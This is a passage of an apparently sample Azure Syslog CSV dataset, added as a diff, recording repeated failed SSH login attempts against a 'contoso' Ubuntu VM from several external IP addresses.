+16546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:29,UbuntuDevEnv,2019-06-26 07:16:29,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 138.68.29.52 port 33532 ssh2,40739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,138.68.29.5,33532,,
+16547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:29,UbuntuDevEnv,2019-06-26 07:16:29,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 138.68.29.52 port 33532 [preauth],40739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,138.68.29.5,33532,,
+16548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:29,UbuntuDevEnv,2019-06-26 07:16:29,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 33532:11: Bye Bye [preauth],40739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,33532,,
+16549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:39,UbuntuDevEnv,2019-06-26 07:16:38,auth,UbuntuDevEnv,info,Invalid user plaunoff from 206.189.118.156 port 52326,40781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plaunoff,206.189.118.1,52326,,
+16550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:39,UbuntuDevEnv,2019-06-26 07:16:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:39,UbuntuDevEnv,2019-06-26 07:16:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,40781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:41,UbuntuDevEnv,2019-06-26 07:16:41,auth,UbuntuDevEnv,info,Failed password for invalid user plaunoff from 206.189.118.156 port 52326 ssh2,40781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plaunoff,206.189.118.1,52326,,
+16553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:41,UbuntuDevEnv,2019-06-26 07:16:41,auth,UbuntuDevEnv,info,Disconnected from invalid user plaunoff 206.189.118.156 port 52326 [preauth],40781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plaunoff,206.189.118.1,52326,,
+16554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:41,UbuntuDevEnv,2019-06-26 07:16:41,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 52326:11: Bye Bye [preauth],40781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,52326,,
+16555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:43,UbuntuDevEnv,2019-06-26 07:16:42,auth,UbuntuDevEnv,info,Invalid user nai from 64.202.187.152 port 40946,40794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nai,64.202.187.1,40946,,
+16556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:43,UbuntuDevEnv,2019-06-26 07:16:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:43,UbuntuDevEnv,2019-06-26 07:16:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,40794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:44,UbuntuDevEnv,2019-06-26 07:16:44,auth,UbuntuDevEnv,info,Failed password for invalid user nai from 64.202.187.152 port 40946 ssh2,40794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nai,64.202.187.1,40946,,
+16559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:44,UbuntuDevEnv,2019-06-26 07:16:44,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 40946:11: Bye Bye [preauth],40794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,40946,,
+16560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:44,UbuntuDevEnv,2019-06-26 07:16:44,auth,UbuntuDevEnv,info,Disconnected from invalid user nai 64.202.187.152 port 40946 [preauth],40794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nai,64.202.187.1,40946,,
+16561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:04,UbuntuDevEnv,2019-06-26 07:17:04,auth,UbuntuDevEnv,info,Invalid user tv from 46.101.149.230 port 39248,40878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tv,46.101.149.2,39248,,
+16562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:04,UbuntuDevEnv,2019-06-26 07:17:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:04,UbuntuDevEnv,2019-06-26 07:17:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,40878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:06,UbuntuDevEnv,2019-06-26 07:17:06,auth,UbuntuDevEnv,info,Failed password for invalid user tv from 46.101.149.230 port 39248 ssh2,40878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tv,46.101.149.2,39248,,
+16565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:06,UbuntuDevEnv,2019-06-26 07:17:06,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 39248:11: Bye Bye [preauth],40878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,39248,,
+16566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:06,UbuntuDevEnv,2019-06-26 07:17:06,auth,UbuntuDevEnv,info,Disconnected from invalid user tv 46.101.149.230 port 39248 [preauth],40878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tv,46.101.149.2,39248,,
+16567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:58,UbuntuDevEnv,2019-06-26 07:17:58,auth,UbuntuDevEnv,info,Invalid user archana from 138.68.29.52 port 50856,41058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,archana,138.68.29.5,50856,,
+16568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:58,UbuntuDevEnv,2019-06-26 07:17:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:17:58,UbuntuDevEnv,2019-06-26 07:17:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,41058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:00,UbuntuDevEnv,2019-06-26 07:18:00,auth,UbuntuDevEnv,info,Failed password for invalid user archana from 138.68.29.52 port 50856 ssh2,41058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,archana,138.68.29.5,50856,,
+16571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:00,UbuntuDevEnv,2019-06-26 07:18:00,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 50856:11: Bye Bye [preauth],41058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,50856,,
+16572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:00,UbuntuDevEnv,2019-06-26 07:18:00,auth,UbuntuDevEnv,info,Disconnected from invalid user archana 138.68.29.52 port 50856 [preauth],41058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,archana,138.68.29.5,50856,,
+16573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:09,UbuntuDevEnv,2019-06-26 07:18:08,auth,UbuntuDevEnv,info,Invalid user info from 206.189.118.156 port 41548,41105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,206.189.118.1,41548,,
+16574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:09,UbuntuDevEnv,2019-06-26 07:18:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,41105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:09,UbuntuDevEnv,2019-06-26 07:18:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:10,UbuntuDevEnv,2019-06-26 07:18:10,auth,UbuntuDevEnv,info,Invalid user hotel from 87.101.240.10 port 36536,41103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hotel,87.101.240.1,36536,,
+16577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:10,UbuntuDevEnv,2019-06-26 07:18:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,41103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:10,UbuntuDevEnv,2019-06-26 07:18:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:11,UbuntuDevEnv,2019-06-26 07:18:10,auth,UbuntuDevEnv,info,Failed password for invalid user info from 206.189.118.156 port 41548 ssh2,41105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,206.189.118.1,41548,,
+16580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:11,UbuntuDevEnv,2019-06-26 07:18:10,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 41548:11: Bye Bye [preauth],41105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,41548,,
+16581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:11,UbuntuDevEnv,2019-06-26 07:18:10,auth,UbuntuDevEnv,info,Disconnected from invalid user info 206.189.118.156 port 41548 [preauth],41105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,206.189.118.1,41548,,
+16582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:12,UbuntuDevEnv,2019-06-26 07:18:12,auth,UbuntuDevEnv,info,Failed password for invalid user hotel from 87.101.240.10 port 36536 ssh2,41103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hotel,87.101.240.1,36536,,
+16583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:12,UbuntuDevEnv,2019-06-26 07:18:12,auth,UbuntuDevEnv,info,Invalid user hydra from 64.202.187.152 port 58380,41120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hydra,64.202.187.1,58380,,
+16584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:12,UbuntuDevEnv,2019-06-26 07:18:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:12,UbuntuDevEnv,2019-06-26 07:18:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,41120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:13,UbuntuDevEnv,2019-06-26 07:18:12,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 36536:11: Bye Bye [preauth],41103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,36536,,
+16587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:13,UbuntuDevEnv,2019-06-26 07:18:12,auth,UbuntuDevEnv,info,Disconnected from invalid user hotel 87.101.240.10 port 36536 [preauth],41103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hotel,87.101.240.1,36536,,
+16588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:14,UbuntuDevEnv,2019-06-26 07:18:14,auth,UbuntuDevEnv,info,Failed password for invalid user hydra from 64.202.187.152 port 58380 ssh2,41120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hydra,64.202.187.1,58380,,
+16589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:14,UbuntuDevEnv,2019-06-26 07:18:14,auth,UbuntuDevEnv,info,Disconnected from invalid user hydra 64.202.187.152 port 58380 [preauth],41120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hydra,64.202.187.1,58380,,
+16590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:14,UbuntuDevEnv,2019-06-26 07:18:14,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 58380:11: Bye Bye [preauth],41120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,58380,,
+16591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:24,UbuntuDevEnv,2019-06-26 07:18:24,auth,UbuntuDevEnv,info,Invalid user bananapi from 45.55.190.46 port 60174,41109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bananapi,45.55.190.4,60174,,
+16592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:24,UbuntuDevEnv,2019-06-26 07:18:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,41109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:24,UbuntuDevEnv,2019-06-26 07:18:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:26,UbuntuDevEnv,2019-06-26 07:18:25,auth,UbuntuDevEnv,info,Failed password for invalid user bananapi from 45.55.190.46 port 60174 ssh2,41109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bananapi,45.55.190.4,60174,,
+16595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:26,UbuntuDevEnv,2019-06-26 07:18:26,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 60174:11: Bye Bye [preauth],41109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,60174,,
+16596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:18:26,UbuntuDevEnv,2019-06-26 07:18:26,auth,UbuntuDevEnv,info,Disconnected from invalid user bananapi 45.55.190.46 port 60174 [preauth],41109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bananapi,45.55.190.4,60174,,
+16597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:16,UbuntuDevEnv,2019-06-26 07:19:15,auth,UbuntuDevEnv,info,Invalid user pei from 46.101.149.230 port 56370,41718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pei,46.101.149.2,56370,,
+16598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:16,UbuntuDevEnv,2019-06-26 07:19:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,41718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:16,UbuntuDevEnv,2019-06-26 07:19:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:19,UbuntuDevEnv,2019-06-26 07:19:18,auth,UbuntuDevEnv,info,Failed password for invalid user pei from 46.101.149.230 port 56370 ssh2,41718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pei,46.101.149.2,56370,,
+16601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:19,UbuntuDevEnv,2019-06-26 07:19:18,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 56370:11: Bye Bye [preauth],41718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,56370,,
+16602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:19,UbuntuDevEnv,2019-06-26 07:19:18,auth,UbuntuDevEnv,info,Disconnected from invalid user pei 46.101.149.230 port 56370 [preauth],41718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pei,46.101.149.2,56370,,
+16603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:27,UbuntuDevEnv,2019-06-26 07:19:27,auth,UbuntuDevEnv,info,Invalid user demo from 138.68.29.52 port 39940,41770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,138.68.29.5,39940,,
+16604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:27,UbuntuDevEnv,2019-06-26 07:19:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,41770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:27,UbuntuDevEnv,2019-06-26 07:19:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
